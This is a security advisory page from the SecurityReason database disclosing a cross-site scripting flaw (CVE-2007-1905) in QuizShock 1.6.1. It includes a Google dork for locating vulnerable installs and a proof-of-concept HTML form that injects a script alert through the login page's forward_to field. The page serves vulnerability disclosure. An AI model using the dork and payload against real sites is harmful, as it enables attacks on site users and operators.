|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2554 CVE : CVE-2007-1905 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : John Martinelli Published : 13.04.2007
Advisory Content : <!-- QuizShock 1.6.1 - Cross-Site Scripting Vulnerability Vulnerable: QuizShock 1.6.1 (tested 1.5.8, 1.5.9, 1.6.0, and 1.6.1) Google d0rk: allintitle:"powered by QuizShock" John Martinelli john<img src="/imgs/at.gif" border=0 align=middle>martinelli.com http://john-martinelli.com april 8th, 2007 !--> <html> <head><title>QuizShock 1.6.1 Cross-Site Scripting Vulnerability</title><body> <center><br><br><font size=4>QuizShock 1.6.1 Cross-Site Scripting Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a></font><br> <br><br> <form action="http://target.com/auth.php" method="post"> <input type=hidden name=ts_username size=10 class="input"> <input name="forward_to" size=75 value="<"<<script>alert(551660661);</script>"> <input type=hidden name="fn" value="login"> <input type=hidden name=ts_password type=password class="input"> <input type=hidden name="remember" value=0 class=input> <input type=submit value="Execute XSS Attack" class="button"> </form> </body></html>  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |